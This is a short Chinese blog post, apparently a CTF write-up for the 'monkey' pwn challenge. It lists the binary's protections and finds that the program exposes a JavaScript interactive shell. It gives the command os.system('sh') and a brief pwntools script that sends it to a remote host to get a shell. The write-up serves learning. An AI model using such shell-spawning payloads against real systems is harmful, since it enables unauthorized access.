0
点赞
收藏
分享

微信扫一扫

pwn刷题num13---js交互式命令行模式

攻防世界pwn进阶区monkey
在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
在这里插入图片描述

32位,小端序
未开启RELRO---got表可写
未开启canary保护---存在栈溢出
开启NX保护----注入的shellcode不可执行
未开启PIE----程序地址为真实地址
动态链接

运行后出现一个js>很奇怪
在这里插入图片描述
ida后找不到主函数
在这里插入图片描述
怀疑不是c语言程序
上查一下js,意思是JavaScript
看了别人的wp,发现这个程序直接是js的交互式命令行模式

os.system('sh')

这是js的系统调用shell的命令

exp

from pwn import *
sh = remote('111.200.241.244',55683)
sh.sendlineafter('js>',"os.system('sh')")
sh.interactive()

在这里插入图片描述

或者不用exp
直接连接到远程,输入os.system(‘sh’)在这里插入图片描述

举报

相关推荐

0 条评论